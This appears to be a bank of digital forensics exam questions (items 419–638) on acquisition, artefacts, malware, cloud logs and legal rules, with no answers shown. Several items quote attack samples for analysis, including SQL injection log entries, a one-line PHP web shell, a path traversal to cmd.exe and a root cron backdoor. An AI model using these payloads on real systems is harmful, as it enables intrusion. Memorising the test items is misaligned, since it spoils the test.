Medium419A forensic examiner is analyzing an Android device that has been factory reset. Which of the following artefacts is MOST likely to still be recoverable from the device's flash memory after a factory reset, assuming no overwrite has occurred?
Hard420A security analyst is reviewing Apache access logs and finds repeated requests to /index.php?id=1' OR '1'='1. Which type of attack is MOST likely being attempted?
Medium421Which TWO of the following are valid methods to collect logs from Docker containers for forensic analysis? (Select TWO)
Hard422During a forensic investigation, a first responder notices that a computer is running and suspects that volatile data may be present. According to best practices, what should the responder do to preserve the most volatile data first?
Hard423During a forensic examination of a macOS system, you find a file at /private/var/log/system.log and also notice a directory /private/var/db/diagnostics/. What is the significance of these locations?
Hard424A forensic analyst is investigating a MySQL database server breach. Which log is MOST useful for identifying a series of queries that exfiltrated data, assuming the attacker used a compromised application account?
Hard425A SOC analyst is analyzing a packet capture from a network where an internal host communicated with a known malicious IP. The analyst uses Wireshark and applies a display filter to isolate all HTTP traffic. Which filter expression should he use?
Hard426An email forensic analyst receives a suspicious email and wants to verify the originating IP address. The analyst extracts the email headers and sees multiple 'Received' fields. Which 'Received' header should the analyst consider as the most trustworthy source of the sender's IP?
Medium427A forensic investigator is analyzing a malware sample that appears to be packed. Using PEiD, the analyst detects an entropy value of 7.8 and the entry point section is named 'UPX0'. Which of the following tools should the analyst use NEXT to unpack the malware for static analysis?
Hard428An incident responder is analyzing a compromised web server and finds a file named 'cmd.aspx' in the uploads directory. The file contains ASP.NET code that accepts commands via the 'cmd' parameter and executes them on the server. Which of the following best describes this artifact?
Hard429During a forensic investigation, an analyst uses the following command: dd if=/dev/sda of=/mnt/evidence/image.dd bs=4096 conv=noerror,sync. What is the effect of the conv=noerror,sync option?
Hard430In the context of the US Fourth Amendment, what is typically required for law enforcement to seize a computer for forensic examination?
Easy431Which Windows artifact is specifically designed to track the most recently used (MRU) files for specific applications and can be found in the NTUSER.DAT registry hive?
Medium432A first responder arrives at a crime scene where a computer is powered on and displaying a desktop. According to best practices, which of the following actions should the responder take FIRST?
Easy433A first responder arrives at a crime scene where a computer is running. Which THREE actions should the first responder take to preserve volatile evidence?
Hard434During a malware investigation, you find that a process named `svchost.exe` is making outbound connections to an IP address known to be malicious. What tool would be BEST to capture the network traffic for further analysis?
Medium435During an internal investigation, an employee is suspected of leaking sensitive data. The security team finds that the employee's computer has been turned off. Which of the following evidence types would be LOST due to the system being powered off?
Hard436Which mobile forensics tool is specifically designed for physical extraction of iOS devices, including bypassing passcodes and extracting full file system images?
Easy437During a forensic examination of a solid-state drive (SSD), the analyst notices that the TRIM command was enabled. What challenge does this pose for data recovery?
Hard438A first responder is called to a scene where a Windows laptop is suspected of being used in a crime. The laptop is turned on and logged in. The responder needs to preserve the most volatile evidence first. Which of the following should be captured first?
Easy439Which of the following is the primary purpose of using a hardware write blocker during disk acquisition?
Easy440Which TWO of the following are anti-forensic techniques used by malware to evade detection?
Easy441A junior examiner is preparing a forensics lab workstation that will be used to image suspect drives. The lab policy states the workstation must never write to a connected suspect drive. Which practice ensures this requirement is met?
Easy442A malware analyst is using a tool to monitor registry and file system changes during the execution of a suspicious binary. Which tool is specifically designed to take snapshots of the registry and file system before and after execution to identify changes?
Medium443Which two of the following are characteristics of the ext4 file system? (Choose TWO.)
Medium444An analyst recovers a hard drive from a suspect's computer. The drive has a partition table that uses a 32-bit identifier and a maximum partition size of 2 TB. Which partition table type is present?
Easy445A security analyst is investigating a potential data breach in a GCP environment. The analyst reviews the GCP audit logs and finds the following events: (1) A service account was granted the 'roles/storage.objectAdmin' role on a storage bucket containing sensitive data, (2) The service account then listed objects in the bucket, (3) The service account downloaded several objects. Which THREE actions should the analyst take immediately?
Hard446An analyst is examining a memory dump using Volatility and wants to identify network connections. Which TWO Volatility plugins can be used to list network connections?
Medium447Which THREE of the following are commonly used network forensic data sources?
Medium448In an email header, which field typically contains the IP address of the original sending client?
Easy449A forensic analyst is examining a Windows 10 system for evidence of USB device usage. Which registry hive and key path should she check to find a list of USB devices that have been connected to the system?
Medium450A forensic examiner is analyzing an Android device for potential evidence of a specific app’s data. Which TWO locations within the device’s file system would MOST likely contain application-specific data?
Medium451Which TWO of the following are indicators of a webshell attack found in web server logs? (Select TWO)
Easy452A forensic examiner uses a hardware write blocker when imaging a suspect's hard drive. What is the primary function of a hardware write blocker?
Medium453In ext3/ext4 file systems, which THREE of the following are key structures used for file metadata and recovery?
Hard454Which file system artifact in NTFS records file system events such as file creation, deletion, and modification, and is often used to track attacker activities?
Easy455A company receives a legal hold notice regarding a lawsuit. What immediate action should the company take to comply?
Medium456A forensic analyst finds a file with the .plist extension on a Mac system. What type of artifact is this?
Medium457In MySQL forensics, which log file is most commonly used to detect unauthorized data exfiltration or changes to database records?
Medium458A security analyst notices that a log file on a Linux server shows repeated failed SSH login attempts from an external IP address, but no successful login from that IP. However, the /var/log/auth.log file has been recently truncated. Which type of evidence is the truncated log file?
Medium459Which THREE of the following are valid memory forensic artifacts that can be extracted using the Volatility framework?
Hard460An investigator is examining a FAT32 filesystem and needs to recover a deleted file. In FAT32, the directory entry for a deleted file has the first byte of the filename set to 0xE5. What does this indicate?
Medium461An investigator needs to recover a deleted partition from a disk that originally used an MBR partition table. Which tool can scan the disk for lost partitions and rebuild the partition table?
Medium462A CHFI analyst is called to investigate a suspected insider threat. The suspect's laptop is turned on and logged in. The analyst needs to capture volatile data before shutting it down. Which of the following should the analyst capture first?
Easy463A first responder is called to investigate a potential insider threat. The suspect's computer is turned off. What is the BEST procedure?
Easy464Which of the following is the BEST description of Locard's exchange principle as applied to digital forensics?
Medium465A forensic analyst is recovering deleted files from an ext3 file system. Which TWO methods can be used to recover deleted inodes?
Hard466Which TWO artifacts are commonly used to identify USB device insertion history on a Windows system? (Select TWO.)
Medium467Which TWO of the following hashing algorithms are commonly used to verify the integrity of forensic images? (Choose two.)
Easy468During a forensic investigation, a lawyer objects to the admissibility of a log file on the grounds that it is hearsay. Which of the following is the BEST argument to overcome this objection?
Medium469A forensic examiner is preparing to testify as an expert witness. Which THREE of the following qualities are essential for the examiner's testimony to be admissible under the Daubert standard? (Select THREE)
Medium470An investigator finds evidence of data hidden using Alternate Data Streams (ADS) on an NTFS volume. Which command would display all ADS associated with files in a directory?
Medium471During a network forensic investigation, the analyst examines firewall logs and notices a large number of outbound connections from an internal server to various IP addresses on port 443 at regular intervals. The connections are all initiated by a process called 'svchost.exe' running from a non-standard location (C:\Windows\Temp). What is the MOST likely explanation?
Hard472Which Android file system location is MOST likely to contain user-installed app data, preferences, and cached information?
Easy473A forensic analyst finds multiple Prefetch files in C:\Windows\Prefetch with recent timestamps. What is the primary value of Prefetch files in an investigation?
Medium474A malware analyst is examining a suspicious Windows executable. Running 'strings' reveals references to 'C:\Windows\System32\drivers\etc\hosts' and IP addresses 185.130.5.21 and 192.168.1.1. Dynamic analysis in a sandbox shows the binary modifies the hosts file and creates a mutex named 'Global\Mtx_Update'. Which behavioral indicator is MOST clearly associated with persistence?
Hard475A forensic investigator is analyzing a Windows system suspected of malware infection. Which THREE of the following are common persistence mechanisms that malware may use?
Medium476During a forensic investigation, an analyst recovers a hard drive that uses GPT partitioning. The analyst needs to locate the backup GPT header to verify partition table integrity. Where is the backup GPT header typically stored on the disk?
Medium477During a database forensic investigation, an analyst recovers a MySQL binary log file (binlog.000012) from a compromised server. Which command should the analyst use to extract the actual SQL statements from this binary log in a human-readable format?
Medium478A forensic examiner is analyzing a Linux system suspected of being used as a C2 server. Which THREE artifacts should the examiner prioritize to find evidence of command execution and persistence? (Select three.)
Hard479An analyst is examining a Windows 10 system and discovers a file in the $Recycle.bin folder with a name like '$RABCDEF.txt'. The analyst wants to recover the original file path and deletion date. Which forensic artifact should the analyst examine?
Easy480An investigator must acquire a 2 TB USB 3.0 external hard drive as evidence in a fraud case. The drive contains a single NTFS volume with 500 GB of allocated data. The investigator needs to create a forensic image that captures all allocated and unallocated space, and the acquisition must be completed as quickly as possible while maintaining evidential integrity. Which acquisition method should the investigator use?
Medium481During a forensic investigation, the examiner uses a write blocker to connect the suspect drive to the forensic workstation. What is the PRIMARY purpose of using a write blocker?
Medium482In a UK-based investigation, the police seize a computer without a warrant. The suspect's lawyer argues that the evidence is inadmissible because it violates which law?
Hard483In Windows forensics, which artifact is a database of metadata about files and applications accessed by the user, used to populate the 'Recent Items' and 'Quick Access' lists?
Easy484An iOS forensic examiner recovers a Keychain dump from an iPhone. Which of the following types of data is typically NOT stored in the iOS Keychain?
Medium485A forensic analyst is examining a Microsoft Outlook PST file as part of an email investigation. Which tool is specifically designed to parse and analyze PST files and extract email metadata?
Medium486After a factory reset on an Android device, a forensic examiner attempts to recover user data. Which of the following statements is most accurate regarding the recoverability of data?
Hard487Which tool is specifically designed to extract metadata from email messages, including tracking the route and identifying the originating IP address?
Medium488A security analyst observes a suspicious process creating multiple mutexes with names like 'XxX_12345' and 'XxX_67890' and making outbound connections to an IP address 185.130.5.1 on port 443. Which behavioral indicator is MOST consistent with malware communication?
Hard489In Windows registry forensics, which registry hive contains the SAM database storing local user account hashes?
Easy490A security analyst detects that a known malware sample writes to the registry key 'HKLM\SYSTEM\CurrentControlSet\Services\<malware>\ImagePath' and creates a service. This behavior is characteristic of which type of persistence mechanism?
Medium491During a forensic investigation, an analyst uses a tool to create a bit-for-bit copy of a hard drive while ensuring the original is not modified. Which of the following is a hardware write blocker that can be used for this purpose?
Medium492Which of the following is an example of Locard's Exchange Principle as applied to digital forensics?
Medium493Which of the following is the primary purpose of performing static analysis on a suspicious binary?
Easy494During an e-discovery process, a legal hold is issued. What is the PRIMARY purpose of a legal hold?
Medium495During a forensic investigation of a compromised web server, an analyst finds the following entry in the IIS access log: 192.168.1.5, -, 04/May/2024:14:23:11, GET /scripts/..%5c../windows/system32/cmd.exe, 200. What is the probable attack vector?
Hard496In database forensics, which type of log records every transaction (including INSERT, UPDATE, DELETE) and allows reconstruction of database changes over time?
Easy497Which network forensic tool is BEST suited for analyzing NetFlow data to identify top talkers and detect anomalies?
Easy498An analyst is investigating a possible data exfiltration via email. The analyst notices that the email headers contain a DKIM-Signature field that is invalid. Which of the following does a failed DKIM check indicate?
Hard499Which TWO of the following are primary purposes of using the GrayKey tool in iOS forensics?
Easy500Which of the following BEST describes the purpose of a legal hold in e-discovery?
Medium501Which TWO of the following are common indicators of a path traversal attack found in web server logs? (Select 2)
Medium502A forensic analyst is examining a Windows system and wants to identify recently accessed files and programs. Which TWO artifacts should the analyst prioritize? (Select TWO.)
Medium503During a forensic investigation, a junior analyst suggests using a software write blocker to image a suspect's hard drive. Which of the following is the PRIMARY concern with relying solely on a software write blocker in a high-stakes legal case?
Medium504Refer to the exhibit. During a malware investigation, a forensic analyst runs the commands shown. What is the most likely conclusion?
Medium505A forensic examiner finds a file on an NTFS volume that appears to have data hidden in its alternate data stream. The file's size is reported as 10 KB, but the volume's cluster size is 4 KB. How many clusters of file slack could potentially contain hidden data in the primary stream?
Hard506During a cloud forensics investigation, an analyst examines AWS CloudTrail logs and finds an event with "userIdentity":{"type":"AssumedRole","arn":"arn:aws:sts::123456789012:assumed-role/AdminRole/i-0abcd1234efgh5678"}. What does the 'i-0abcd1234efgh5678' portion most likely represent?
Hard507During a forensic investigation of a Linux system, you need to determine which commands a user executed in their shell session. Which file would you examine to find this information?
Medium508An incident responder is analyzing AWS CloudTrail logs to determine if an unauthorized user accessed an S3 bucket. Which of the following CloudTrail event fields should be examined to identify the IAM user or role that made the API call?
Medium509An analyst is investigating a potential data breach on an Android device. Which TWO artefacts are MOST useful for determining which third-party apps were installed and used? (Select TWO.)
Medium510A forensic analyst creates a forensic image of a hard drive using the dd command: dd if=/dev/sda of=/evidence/image.dd bs=4096 conv=noerror,sync. What is the purpose of the 'conv=noerror,sync' option?
Medium511A legal hold is issued by an organization's legal department. What is the primary purpose of a legal hold?
Medium512You are investigating a Windows 10 workstation that exhibits slow performance and frequent pop-ups. The user reports that the system started acting strangely after installing a 'PDF Converter' from an email attachment. You suspect malware. You have captured a memory dump using FTK Imager and a network capture during the infection. In the memory dump, you find a suspicious process 'conhost.exe' running from a non-standard location (C:\Users\Public\Temp). The process has an open handle to a file named 'config.ini' in the same directory. The network capture shows periodic HTTPS connections to 'malicious.com' on port 443 from the workstation's IP. Using Volatility, you extract the process's command line: 'conhost.exe -hidden -log C:\Users\Public\Temp\output.log'. Which of the following is the BEST immediate course of action to contain the threat and preserve evidence?
Hard513Which TWO of the following are valid justifications for a first responder to power off a computer at a crime scene? (Select TWO)
Medium514A forensics examiner finds a suspicious entry in the Windows Registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run pointing to a PowerShell command. Which persistence mechanism does this represent, and what is the MOST likely impact?
Hard515During a malware analysis, a suspicious executable is detected. The analyst runs `strings` on the binary and finds references to `SOFTWARE\Microsoft\Windows\CurrentVersion\Run` and a URL `http://evil.com/beacon`. What does this indicate?
Medium516In Linux forensics, which file contains information about user account passwords in hashed form?
Easy517According to Locard's exchange principle, which of the following is TRUE in a digital forensic context?
Easy518An analyst is analyzing a disk image and finds a 512-byte sector at LBA 0 that contains a bootloader and a partition table. The partition table has four entries, each 16 bytes. What type of partition table is this?
Medium519A forensic examiner has acquired a disk image using FTK Imager and needs to ensure the image is an exact duplicate of the original drive. Which THREE of the following methods can be used to verify integrity? (Select THREE)
Hard520During a Windows forensic analysis, you find a suspicious LNK file in a user's Recent folder. Which of the following is NOT typically retrievable from an LNK file?
Medium521In email forensics, which artifact is stored in Outlook's Personal Folders (.pst) files and can be analyzed using tools like Aid4Mail or EmailTracker?
Easy522Under the US Fourth Amendment, when is a warrant generally NOT required for a computer search and seizure?
Easy523Which hashing algorithm is commonly used in forensic imaging to verify the integrity of evidence and is considered more secure than MD5?
Medium524A forensic analyst reviews a Windows system for signs of malware persistence. Which TWO registry locations are commonly used to achieve persistence via auto-start programs?
Easy525A forensic analyst is examining a Docker container image for malware. Which TWO techniques can help analyze the image layers?
Easy526A security analyst observes multiple Event ID 4625 logon failures for a single user account within a short time frame, followed by Event ID 4624 logon success. Which attack technique is MOST likely indicated?
Medium527During dynamic analysis of a suspicious executable in Cuckoo Sandbox, the report shows that the process created a registry key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run named 'WindowsUpdate' and dropped a file 'svchost.exe' in %AppData%. Which conclusion is MOST consistent with these indicators?
Hard528Which tool is specifically designed to extract and analyze email metadata, including headers, from various email client formats such as PST and OST files?
Easy529An analyst reviews an Apache access log entry: '192.168.1.10 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 1234 "-" "Mozilla/5.0"'. Which attack does this log entry most likely indicate?
Medium530In an AWS environment, a security analyst detects unusual API calls that created several IAM users with administrative privileges from an unfamiliar IP address. Which AWS service log should be examined first to identify the specific API calls and the IAM user that made them?
Medium531In an investigation of a Windows system, the analyst uses Volatility's 'netscan' plugin and identifies a suspicious outbound connection to an IP address on port 4444. Which of the following is the most likely associated malicious activity?
Medium532You are a forensic analyst investigating a Windows workstation that shows signs of malware infection. The user reports that the system is slow, network activity is high, and several files have been encrypted with a .encrypted extension. A ransom note named README.txt has been left on the desktop demanding payment. You have acquired a memory dump using FTK Imager and a disk image using dd. You need to identify the malware family and gather indicators of compromise (IOCs). Which of the following is the MOST appropriate first step?
Easy533During memory analysis, an examiner uses the Volatility 'malfind' plugin and discovers a process with executable code in an executable heap. Which technique is most likely being used by malware to avoid detection?
Hard534During malware analysis, an investigator finds that a suspicious process is injecting code into a legitimate system process (e.g., explorer.exe). Which technique is being used?
Medium535You are a forensic analyst investigating a suspected malware infection on a Windows 10 workstation. The user reports that the system has been slow and that unexpected pop-ups appear. You have acquired a memory dump and a disk image. During analysis, you find a suspicious process named 'svch0st.exe' running with PID 4567. The process has loaded several DLLs, including 'wininet.dll' and 'ws2_32.dll'. You also find that the process has an active TCP connection to an external IP address 203.0.113.5 on port 4444. In the disk image, you find an executable file at C:\Users\Public\svch0st.exe with a creation date that matches the start of symptoms. The file's hash is not in any known malware database. You decide to perform dynamic analysis by running the file in a sandbox. However, the sandbox environment has no network connectivity. The executable runs but does not exhibit any malicious behavior. What should you do next to determine if the file is malicious?
Medium536A security analyst suspects an attacker has hidden data in the Host Protected Area (HPA) of a suspect's hard drive. Which of the following tools is BEST suited to detect and access the HPA?
Hard537A forensic lab is establishing a chain of custody procedure. Which practice is considered best according to CHFI guidelines?
Medium538A forensic analyst is examining a USB flash drive formatted with the FAT32 file system. The analyst needs to determine the total number of sectors in a cluster and the number of reserved sectors. Which of the following structures in the FAT32 file system contains this information?
Easy539A forensic investigator is analyzing a cloud environment hosted on Amazon Web Services (AWS). A compromised EC2 instance was used to exfiltrate data to an external IP address. The investigator needs to determine which AWS API calls were made to modify security groups to allow outbound traffic to that IP. Which AWS service should the investigator use to obtain this information?
Medium540An examiner is analyzing an NTFS volume and suspects that a suspect hid data using Alternate Data Streams (ADS). Which tool or method is MOST appropriate to list all ADS on the volume?
Medium541Which of the following is the BEST definition of Locard's exchange principle in computer forensics?
Easy542Which TWO of the following are valid reasons for using a hardware write blocker over a software write blocker? (Select two.)
Medium543In Linux forensics, an investigator examines /var/log/auth.log and finds repeated entries of "Failed password for root from 10.0.0.5 port 22 ssh2". Which type of attack is most likely indicated?
Easy544Which TWO of the following are valid reasons for a first responder to power off a computer system at a crime scene? (Select TWO)
Medium545An analyst executed the commands shown in the exhibit on a Windows system to prepare a forensic image for analysis. What is the most likely reason for the error message from e2fsck?
Medium546A first responder arrives at a crime scene where a computer is turned on. What should the responder do FIRST?
Easy547During a forensic examination of a Linux ext4 file system, an investigator runs the `ls -i` command and sees inode numbers. They need to examine the inode structure. Which command should they use to display detailed inode information?
Medium548During a forensic investigation, the analyst needs to verify the integrity of a forensic image. The analyst originally computed MD5 and SHA-1 hashes of the source drive. Which action BEST ensures the image has not been altered?
Hard549A forensic analyst is examining an Android device for evidence of a specific app's usage. Which TWO locations are MOST likely to contain app-specific data that can be recovered through a logical acquisition?
Medium550A forensic investigator is analyzing a Microsoft SQL Server instance that was compromised. The investigator wants to identify all login attempts that failed due to incorrect passwords. Which system function or view should be queried?
Easy551Which of the following best describes the purpose of the Host Protected Area (HPA) on a hard disk drive?
Medium552A security analyst is reviewing Windows Event Logs and notices multiple Event ID 4625 entries for a single user account within a short time frame. What does this most likely indicate?
Easy553During a forensic investigation, you find a file named ntuser.dat.LOG1 in a user's profile directory. What is the primary purpose of this file?
Medium554A security analyst suspects a mobile device is infected with malware that exfiltrates data via DNS queries. Which tool or technique would be MOST effective for detecting this behavior during dynamic analysis?
Medium555Which mobile forensic tool is commonly used to perform a physical extraction of an iOS device, including bypassing the lock screen on certain models?
Easy556Which THREE of the following are indicators of a web shell on a web server? (Select three.)
Hard557A security analyst is investigating a potential intrusion and finds a webshell on a Linux web server. Which of the following logs would be MOST useful to determine how the webshell was uploaded?
Medium558A forensic analyst is investigating a Windows system and wants to identify recently executed programs. Which TWO artifacts should the analyst examine?
Medium559Which TWO of the following are challenges specific to SSD forensics compared to HDD forensics?
Hard560A forensic analyst is examining MySQL binary logs to identify a data exfiltration event. Which TWO fields are most critical for reconstructing the stolen data?
Medium561Based on the ARP table exhibit, what is the most likely security issue?
Medium562During a forensic investigation, the analyst needs to create a forensic image of a hard drive that also hashes the data during acquisition. Which command-line tool would be MOST appropriate for this task?
Medium563Which Wireshark filter should an analyst use to display only TCP packets that have the SYN flag set and the ACK flag not set?
Easy564Which tool is commonly used for timeline analysis in digital forensics, combining multiple artifacts into a super timeline?
Easy565Which THREE of the following are essential steps in the digital forensics investigation process? (Select three.)
Hard566You are a forensic investigator responding to an incident on a Windows 10 workstation used by a finance manager. The user reports that a critical spreadsheet containing quarterly budget data was accidentally deleted from the Desktop yesterday at approximately 3:00 PM. The system has been used normally since then, and the user has not emptied the Recycle Bin. You have created a forensic image of the drive using FTK Imager. The Recycle Bin contains a file named 'Quarterly_Budget.xlsx', but it appears to be a shortcut (size 1 KB). The user insists the original file was several megabytes. You need to recover the original file. Which action should you take next?
Easy567During a mobile device investigation, an examiner needs to acquire the maximum amount of data from a locked iOS device without modifying it. Which acquisition type should be used?
Easy568A security analyst reviews an Apache access log entry: 192.168.1.5 - - [10/Jan/2024:08:12:35 +0000] "GET /index.php?id=1 UNION SELECT username,password FROM users-- HTTP/1.1" 200 4321 "-" "Mozilla/5.0". What type of attack is MOST likely indicated?
Easy569An investigator finds a suspicious LNK file on a Windows desktop pointing to an executable in the Temp folder. What is the significance of LNK files in forensic analysis?
Medium570A forensic analyst needs to create a forensic image of a suspect's hard drive using FTK Imager. Which of the following image formats is MOST appropriate for maintaining evidence integrity and allowing compression?
Medium571You are a forensic examiner at a corporate security firm. You receive a laptop from the HR department that belonged to a terminated employee. The laptop was used for company business and is suspected of containing unauthorized file-sharing software. The laptop is running Windows 10 with BitLocker drive encryption enabled. Before shutdown, the employee was logged into the system. HR claims the laptop was shut down properly and then handed over within an hour. You are asked to acquire a forensic image of the hard drive for analysis. However, when you boot the laptop, you are prompted for the BitLocker recovery key. HR does not have the key, and the employee refuses to cooperate. The laptop also has a TPM chip. Which of the following is the most appropriate course of action to acquire the data?
Easy572An expert witness is preparing to testify in a computer forensics case. Which of the following is a key requirement for the expert's testimony to be admissible under the Daubert standard?
Medium573During a forensic examination of a Windows system, an analyst finds a file that appears to be zero bytes in size when viewed in Windows Explorer, but the file's properties show a size on disk of 4 KB. What is the most likely explanation?
Medium574Which three of the following are common techniques used to hide data on a storage device? (Choose THREE.)
Hard575While investigating a compromised web server, you discover a file named 'shell.php' in the web root. The file contains the following code: <?php system($_GET['cmd']); ?>. Which of the following best describes this file?
Hard576During a forensic examination, an analyst runs `dcfldd if=/dev/sda of=image.dd hash=sha256 hashwindow=1G` on a suspect drive. What is the PRIMARY advantage of using `hashwindow=1G` over a single hash at the end?
Hard577During dynamic analysis of a Windows malware sample, Process Monitor shows repeated writes to 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'. What does this behaviour indicate?
Hard578A network forensics analyst captures traffic from a suspected data exfiltration. In Wireshark, filtering for DNS queries containing a long subdomain with base64-encoded text suggests which technique?
Medium579In static malware analysis, what is the purpose of using a tool like PEiD?
Easy580Which of the following is a primary challenge in cloud forensics due to the shared responsibility model?
Easy581An investigator seizes a computer that was involved in a crime. The suspect claims that the evidence was planted. Which forensic principle best helps to refute this claim by demonstrating that the evidence could only have been left by the suspect?
Hard582In a UK-based investigation, law enforcement officers seize a computer without a warrant. The suspect argues the seizure violated his rights under the Police and Criminal Evidence Act 1984 (PACE). Which of the following is a key consideration under PACE regarding the admissibility of the seized evidence?
Hard583During a forensic analysis of a compromised web server, an investigator identifies the following log entries. Which THREE entries are the strongest indicators of a successful web shell upload? (Choose three.)
Hard584During the initial response to a suspected data exfiltration, which THREE pieces of volatile data should be collected first? (Choose three.)
Hard585A security analyst discovers unauthorized access to a server. The incident response team decides to preserve evidence. Which of the following actions is MOST critical to ensure the admissibility of evidence in court?
Hard586Which THREE of the following are challenges specific to container forensics? (Select THREE.)
Hard587A network analyst captures traffic and sees an HTTP request containing: GET /wp-content/uploads/evil.php?cmd=id HTTP/1.1. Which of the following is MOST likely occurring?
Medium588An investigator is analyzing a Windows 10 system suspected of malware persistence. Which registry key is commonly used by malware to achieve persistence by running a program at every user logon?
Medium589What is the primary difference between MBR and GPT partition tables?
Easy590According to the US Fourth Amendment, which of the following THREE conditions generally allow law enforcement to search and seize digital evidence without a warrant? (Select THREE)
Hard591An attacker has compromised a Linux server and edited the /etc/passwd file to change a user's UID to 0. What is the likely goal of this modification?
Medium592A forensic examiner is analyzing a compromised Linux server and notices that /etc/cron.daily contains a script named 'sysupdate.sh' that runs a base64-encoded command. Which persistence mechanism is being used?
Hard593Which of the following is a key difference between static and dynamic malware analysis?
Easy594Which of the following is an example of an anti-forensics technique used to hide malicious activity?
Easy595A forensic analyst receives a mobile device that has been factory reset. Which of the following types of data is MOST likely to be recoverable using advanced forensic techniques?
Medium596Which Windows Event ID is generated when a new service is installed on the system?
Easy597Which of the following best describes the purpose of the Master File Table (MFT) in the NTFS filesystem?
Easy598An investigator uses the `volatility -f mem.dump netscan` command on a memory dump from a Windows 10 system. What information is this command primarily intended to reveal?
Medium599During a forensic investigation, you encounter a RAID 5 array consisting of three 1 TB disks. The array is failed, and you need to reconstruct the original data. Which of the following approaches is MOST appropriate for data recovery?
Hard600A forensic examiner needs to acquire the RAM from a Windows 10 system without altering the contents. Which tool is MOST appropriate for this task?
Easy601During a Windows forensic investigation, an analyst finds prefetch files with the .pf extension. Which TWO pieces of information can the analyst obtain from analyzing prefetch files?
Easy602Which of the following tools is designed specifically for dynamic analysis of malware by executing it in a controlled, isolated environment?
Easy603A forensic analyst is examining a Google Cloud Platform (GCP) environment after a security incident. Which TWO GCP services should the analyst use to audit API activity and resource changes? (Select TWO.)
Medium604In Linux forensics, which file contains user account information including the user ID, group ID, home directory, and default shell?
Easy605During a mobile forensic investigation, an examiner finds that the seized iPhone is locked with a passcode but is running iOS 11. Which acquisition method should the examiner prioritize to obtain the most data without bypassing the passcode?
Medium606A security analyst arrives at a crime scene where a computer is turned on and the screen shows a document. What is the FIRST action the analyst should take according to forensic best practices?
Easy607A forensic analyst is performing timeline analysis on a compromised system. Which tool is specifically designed to parse multiple log sources and create a super timeline?
Easy608A forensic analyst is investigating a compromised Microsoft Exchange Server 2019. The attacker gained access to a mailbox and exfiltrated emails. The analyst needs to determine the exact time and IP address from which the attacker accessed the mailbox via Outlook Web App (OWA). Which Exchange log should the analyst examine to find this information?
Hard609During a forensic examination of a Windows 10 system, you find a file with an ADS named `:hidden.txt` attached to `legal.docx`. Using FTK Imager, you extract the ADS and discover it contains a list of passwords. Which tool or technique could also be used to identify this hidden data?
Medium610A network forensic investigator is analyzing traffic from a compromised web server. Which TWO artifacts are MOST likely to indicate the presence of a web shell? (Select TWO.)
Easy611A forensic examiner is testifying in a U.S. court about a disk image acquired from a suspect's computer. The defense attorney argues that the image is not admissible because it is a copy, not the original. The examiner explains that the image was created using a write-blocker and verified with SHA-256 hashes. Which legal principle supports the admissibility of the disk image?
Medium612During a Linux forensic investigation, you find that the file /etc/cron.d/evil contains the entry: '* * * * * root /bin/bash /root/backdoor.sh'. What persistence mechanism is being used?
Hard613A cloud forensic investigator is analyzing a GCP audit log entry for a Compute Engine instance. Which THREE fields are essential for identifying the user and operation performed?
Hard614An organization receives a litigation hold notice regarding an ongoing lawsuit. The IT department is instructed to preserve all relevant electronic data. Which of the following actions should be taken FIRST to comply with the legal hold?
Medium615Which type of evidence is based on information that is not directly from an eyewitness but is reported by someone else?
Easy616A forensic analyst is examining a disk image and needs to identify the file system structure. She looks for the Master File Table ($MFT) to begin analysis. Which file system is she most likely dealing with?
Easy617Which TWO of the following are examples of circumstantial evidence in a digital forensics investigation? (Select TWO)
Easy618Which THREE of the following present unique challenges for forensic analysis of solid-state drives (SSDs) compared to traditional hard disk drives (HDDs)? (Select THREE.)
Hard619A first responder arrives at a crime scene involving a suspected hacking incident. The suspect's computer is powered on and logged in. The responder needs to decide the first action to preserve evidence. According to the order of volatility, which of the following should be collected first?
Easy620Which TWO Windows Event IDs are associated with successful and failed logon events? (Select two.)
Medium621During a forensic investigation, an analyst uses a tool to capture the contents of RAM from a live Linux system. Which tool is specifically designed for this purpose and can acquire memory over a network or via a local kernel module?
Medium622An examiner acquires a forensic image of an SSD from a suspect's laptop. The SSD was connected to a system with TRIM enabled. What challenge will the examiner most likely face when trying to recover deleted files?
Medium623Refer to the exhibit. An investigator is examining a disk image using TSK. The output from 'fls' shows the directory structure. What is the significance of the entry 'V/V 113-128-1: $OrphanFiles'?
Hard624Which TWO of the following are common challenges specific to cloud forensics? (Select TWO)
Medium625A first responder is handling a compromised Linux server that is still powered on and actively communicating with an unknown external IP. The responder needs to collect volatile evidence while minimizing disruption. Which TWO actions should be performed to preserve the most volatile data in the correct order? (Choose two.)
Hard626During an iOS forensic examination, an analyst extracts an iTunes backup and finds a file named 'SMS.db'. Which of the following tools is BEST suited to parse and analyze this SQLite database for SMS and iMessage content?
Medium627A CHFI analyst is preparing a forensic workstation to image a suspect's USB flash drive. The analyst needs to ensure that the write-blocker is functioning correctly before connecting the drive. Which of the following is the most appropriate method to verify that the write-blocker is preventing write operations?
Medium628Which of the following tools is specifically designed to analyze email headers and track the path of an email, providing information about delays and potential spoofing?
Easy629During a database forensic investigation, you need to review Microsoft SQL Server transaction logs to identify unauthorized data modifications. Which of the following SQL Server functions or commands is used to read the transaction log?
Medium630Which TWO of the following are persistence mechanisms commonly found in Windows forensics? (Select two.)
Easy631A forensic lab is designing a network architecture to ensure the integrity of evidence during acquisition. What is the most critical design consideration?
Hard632During a forensic investigation, the analyst runs netstat -ano on a compromised workstation. Based on the exhibit, which connection is MOST suspicious and should be investigated further?
Medium633A forensic analyst is preparing to acquire an image from a suspect's hard drive. The analyst connects the drive to a write blocker, then uses FTK Imager to create a forensic image. Which hashing algorithm is commonly used by FTK Imager to verify image integrity?
Medium634Based on the acquisition log, what can be concluded about the integrity of the acquired image?
Hard635During a forensic examination of a Windows 10 system, you find a file named "chrome_000001.jumplist" in the user's AppData directory. What does the presence of this file indicate?
Hard636A security analyst is using Wireshark during a malware analysis session. The analyst observes a series of DNS queries to a domain 'malware-c2.example.com' every 60 seconds. This behavior is indicative of which malware characteristic?
Medium637Which of the following tools is BEST suited for performing static analysis of a malware binary to identify strings, headers, and imported functions without executing the file?
Easy638During a forensic investigation, an analyst needs to preserve the integrity of evidence on a hard drive. Which of the following is the best practice for acquiring an image of the drive?
